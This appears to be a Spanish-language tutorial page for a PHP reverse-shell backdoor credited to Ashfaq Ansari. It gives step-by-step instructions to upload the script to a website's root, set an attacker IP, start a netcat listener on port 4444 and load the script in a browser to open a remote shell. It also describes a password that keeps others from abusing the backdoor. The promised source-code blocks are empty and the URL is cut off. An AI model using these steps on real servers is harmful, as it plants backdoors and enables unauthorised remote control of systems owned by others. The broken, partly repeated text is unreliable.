PHP Shell Inversa v1.0 - Autenticación de funciones.
Este Script se debe subir en algún lugar de la raíz del sitio web, después ejecutarlo accediendo a la URL correspondiente en su navegador. La Shell se abrirá bajo una conexión TCP desde el servidor web a un host y el puerto definido en el guión.
Esta Shell es adecuada para que se puedan ejecutar programas interactivos como Telnet y SSH.
Esta Shell tiene una función de autenticación incorporada que evita que otra persona abuse de su Backdoor.
Se diferencia de las demas Shell de formulario de autenticacion basado en Web que le permite enviar un solo comando,
Modificación de conexión en el Cod.
1 | $ip = "127.0.0.1"; #Cambie esto a su IP |
Cambie los valores según su necesidad y situación
Configuración de NetCat Receptor:
Inicie un receptor Netcat en un host y el puerto que será accesible por el servidor web.
Utilice el mismo puerto en este momento según lo especificado en el script de shell inversa, por ejemplo, (4444):
Subir el Script y Ejecutarlo:
1 | C:\Users\Antony\netcat>:~ # nc -lvvp 4444 |
Subir el Script y Ejecutarlo:
Subir el Script de Shell Inversa. Ejecute el script simplemente buscando el archivo recién cargado en su navegador web.
1 | http:/ |
Nota: No verá ninguna salida en la página web, si esta tiene activada (display errors) puede que muestre algun warning o error y la pagina queda en un lapso de espera, de ser asi haga caso omiso y revise su NetCat Listener.
En el encontrara la captura del login del script, digite la contraseña configurada para ingresar a la Shell:
Código Fuente de la Shell Inversa
Agradecimiento a @Ashfaq Ansari autor del Script.
1 | C:\Users\Antony\netcat>nc -lvvp 4444 |
Código Fuente de la Shell Inversa
1 |
|